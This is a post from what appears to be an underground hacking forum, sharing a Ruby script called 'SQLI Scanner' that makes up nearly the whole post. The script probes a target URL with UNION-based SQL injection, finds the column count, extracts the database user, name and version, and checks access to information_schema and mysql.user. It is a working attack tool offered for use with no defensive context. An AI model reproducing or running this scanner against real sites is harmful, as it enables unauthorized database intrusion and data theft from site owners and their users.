HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Ruby [Ruby] SQLI Scanner

Status
Not open for further replies.
D

Doddy

Leech
User
Joined
Apr 1, 2012
Messages
169
Reputation
0
Reaction score
406
Points
63
Credits
0
‎13 Years of Service‎
57%
Un scanner de SQLI en ruby

Code: 
>
#!usr/bin/ruby
#SQLI Scannerl (C) Doddy Hackman 2010 
#contact me : doddy-hackman.blogspot.com

require 'net/http'


def uso
 print "\n[+] sqli.rb \n"
end

def toma(host,path)
 http = Net::HTTP.new(host,80)
 return http.get(path).body
end

def details(web,more) 
web1 = more.sub(/hackman/,"0x4b30425241")
more = more.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
print "\n\n[+] Extrating information of the DB\n\n"
url = URI.parse(web)
code = toma(url.host,url.path+"?"+url.query+more)
if code=~/K0BRA(.*?)K0BRA(.*?)K0BRA(.*?)K0BRA/
 print "[username] : "+$1+"\n"
 print "[database] : "+$2+"\n"
 print "[version] : "+$3+"\n\n"

test1 = toma(url.host,url.path+"?"+url.query+web1+"+from+information_schema.tables")
test2 = toma(url.host,url.path+"?"+url.query+web1+"+from+mysql.user")

if test1=~/K0BRA/
 print "[information_schema.tables] : ON\n"
end

if test2=~/K0BRA/
print "[mysql.user] : ON"
end


else 
 print "\n[-] Not Found\n\n"
end
end


def scan(web)
print "\n[+] Testing the vulnerability SQLI...\n\n"
url = URI.parse(web)
codetest = toma(url.host,url.path+"?"+url.query+"-1+union+select+1")
if codetest=~/The used SELECT statements have a different number of columns/
 print "[+] SQLI Detected\n\n"
 else
 print "[-] Not Vulnerable to SQLI\n\n"
 copyright()
end

z = "1"
x = "concat(0x4b30425241,1,0x4b30425241)"
for num in ('2'..'25')
z = z+","+num
x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
#print url.host,url.path+"?"+url.query+"-1+union+select+"+x+"\n"
code = toma(url.host,url.path+"?"+url.query+"-1+union+select+"+x)
if code=~/K0BRA(.*?)K0BRA/
print "[+] The Page has "+num+" columns\n"
print "[+] The number "+$1+" print data\n\n"
z = z.sub($1,"hackman")
print "[sqlI] : "+web+"-1+union+select+"+z
details(web,"-1+union+select+"+z)
copyright()
end
end
print "\n\n[-] Not Found the numbers of the columns\n\n"
copyright()
end

def head() 
 print "\n\n -- == SQLI Scanner == --\n\n"
end

def copyright() 
  print "\n\n\n(C) Doddy Hackman 2010\n\n"
  exit(1)
end

head()
if !ARGV[0] 
 uso()
else 
 scan(ARGV[0]) 
 copyright()  
end
copyright()

#The End ?
 
Status
Not open for further replies.
Back
Top